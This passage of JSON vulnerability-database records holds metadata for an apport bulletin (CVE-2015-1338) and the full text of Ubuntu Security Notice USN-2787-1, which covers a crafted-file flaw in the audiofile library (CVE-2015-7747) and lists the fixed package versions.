{"idList": ["CVE-2015-1338"], "type": "cve"}, {"idList": ["SECURITYVULNS:DOC:32549", "SECURITYVULNS:DOC:32660"], "type": "securityvulns"}], "rev": 2}, "score": {"modified": "2018-08-31T11:10:02", "rev": 2, "value": 6.3, "vector": "NONE"}}, "hash": "1fa5005708a149c7c59442ee368563a06ac60940d1520936b1bdf2bc66d28119", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "cfd16da9581e0c21db590e40dfd9e493", "key": "cvss"}, {"hash": "f2f10dc547bbfec7457259bd6d7e047e", "key": "affectedSoftware"}, {"hash": "c40e388f6268f3ea89c15217ff7a389f", "key": "href"}, {"hash": "5ed00cd4fde4dff0aae89dbca81d74db", "key": "references"}, {"hash": "bc78879f0f9131664d05d93df6e74e24", "key": "description"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "6ba287598210482dd32c01dba6343482", "key": "title"}, {"hash": "2c5cca82a8670da097919f6160833daf", "key": "reporter"}, {"hash": "d8f38bedae5c73d95ff296ba2bd86a44", "key": "modified"}, {"hash": "c673ee2fdc72d8a4f67ca23a54ca10e5", "key": "cvelist"}, {"hash": "d54751dd75af2ea0147b462b3e001cd0", "key": "type"}, {"hash": "d8f38bedae5c73d95ff296ba2bd86a44", "key": "published"}], "history": [], "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14720", "id": "SECURITYVULNS:VULN:14720", "immutableFields": [], "lastseen": "2018-08-31T11:10:02", "modified": "2015-11-02T00:00:00", "objectVersion": "1.5", "published": "2015-11-02T00:00:00", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32660", "https://vulners.com/securityvulns/securityvulns:doc:32549"], "reporter": "BUGTRAQ", "title": "apport security vulnerabilities", "type": "securityvulns", "viewCount": 486}, "different_elements": ["affectedSoftware"], "edition": 1, "lastseen": "2018-08-31T11:10:02"}], "edition": 2, "hashmap": [{"key": "affectedSoftware", "hash": "c063ed29dc851cbe70ebf2ae9876b01e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "c673ee2fdc72d8a4f67ca23a54ca10e5"}, {"key": "cvss", "hash": "cfd16da9581e0c21db590e40dfd9e493"}, {"key": "description", "hash": "bc78879f0f9131664d05d93df6e74e24"}, {"key": "href", "hash": "c40e388f6268f3ea89c15217ff7a389f"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "published", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "references", "hash": "5ed00cd4fde4dff0aae89dbca81d74db"}, {"key": "reporter", "hash": "2c5cca82a8670da097919f6160833daf"}, {"key": "title", "hash": "6ba287598210482dd32c01dba6343482"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "6a476b22964ed9af13d180099f91a74f2789ce11576be85b9f99a47748d85438", "viewCount": 496, "enchantments": {"dependencies": {"references": [{"type": "ubuntucve", "idList": ["UB:CVE-2015-1338"]}, {"type": "cve", "idList": ["CVE-2015-1338"]}, {"type": "exploitdb", "idList": ["EDB-ID:38353"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310842461"]}, {"type": "zdt", "idList": ["1337DAY-ID-24318"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32660", "SECURITYVULNS:DOC:32549"]}, {"type": "ubuntu", "idList": ["USN-2744-1"]}, {"type": "nessus", "idList": ["UBUNTU_USN-2744-1.NASL", "SUSE_SU-2017-1938-1.NASL"]}], "modified": "2021-06-08T18:47:21", "rev": 2}, "score": {"value": 6.3, "vector": "NONE", "modified": "2021-06-08T18:47:21", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [{"name": "apport", "operator": "eq", "version": "2.18"}], "immutableFields": [], "scheme": null, "cvss2": {}, "cvss3": {}}, {"id": "SECURITYVULNS:DOC:32652", "bulletinFamily": "software", "title": "[USN-2787-1] audiofile vulnerability", "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2787-1\r\nOctober 28, 2015\r\n\r\naudiofile vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\naudiofile could be made to crash or run programs as your login if it\r\nopened a specially crafted file.\r\n\r\nSoftware Description:\r\n- audiofile: Open-source version of the SGI audiofile library\r\n\r\nDetails:\r\n\r\nFabrizio Gennari discovered that audiofile incorrectly handled changing\r\nboth the sample format and the number of channels. If a user or automated\r\nsystem were tricked into processing a specially crafted file, audiofile\r\ncould be made to crash, leading to a denial of service, or possibly execute\r\narbitrary code.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libaudiofile1 0.3.6-2ubuntu0.15.10.1\r\n\r\nUbuntu 15.04:\r\n libaudiofile1 0.3.6-2ubuntu0.15.04.1\r\n\r\nUbuntu 14.04 LTS:\r\n libaudiofile1 0.3.6-2ubuntu0.14.04.1\r\n\r\nUbuntu 12.04 LTS:\r\n libaudiofile1 0.3.3-2ubuntu0.1\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2787-1\r\n CVE-2015-7747\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.10.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.14.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.3-2ubuntu0.1\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "published": "2015-11-02T00:00:00", "modified": "2015-11-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32652", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2015-7747"], "type": "securityvulns", "lastseen": "2018-08-31T11:11:02", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "50c023fd612f4a3919caafafd70af1c7"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "e1b942ed5a7d4bd7fdbdd4d984bbcfa8"}, {"key": "href", "hash": "87f14b8fbd08732c6a73b13d46fe98ee"}, {"key": "modified", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "published", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "e9b921c5bed1ed652b982edc288318b4"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "2d5a85403cc62aca18c0b34cea5aabc8d0bf0116ed796c96ad83efa605c5584f", "viewCount": 339, "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2018-08-31T11:11:02", "rev": 2}, "dependencies": {"references": [{"type": "ubuntucve", "idList": ["UB:CVE-2015-7747"]}, {"type": "cve", "idList": ["CVE-2015-7747"]}, {"type": "fedora", "idList": ["FEDORA:476D76074A70", "FEDORA:AC00060E6E18"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310842506", "OPENVAS:1361412562310131103", "OPENVAS:1361412562310806796"]}, {"type": "ubuntu", "idList": ["USN-2787-1"]}, {"type": "nessus", "idList": ["SUSE_SU-2017-0940-1.NASL", "OPENSUSE-2015-698.NASL", "UBUNTU_USN-2787-1.NASL", "FEDORA_2015-605CD28F33.NASL", "FEDORA_2015-4BC7688B3E.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14754"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-3877"]}], "modified": "2018-08-31T11:11:02", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}]}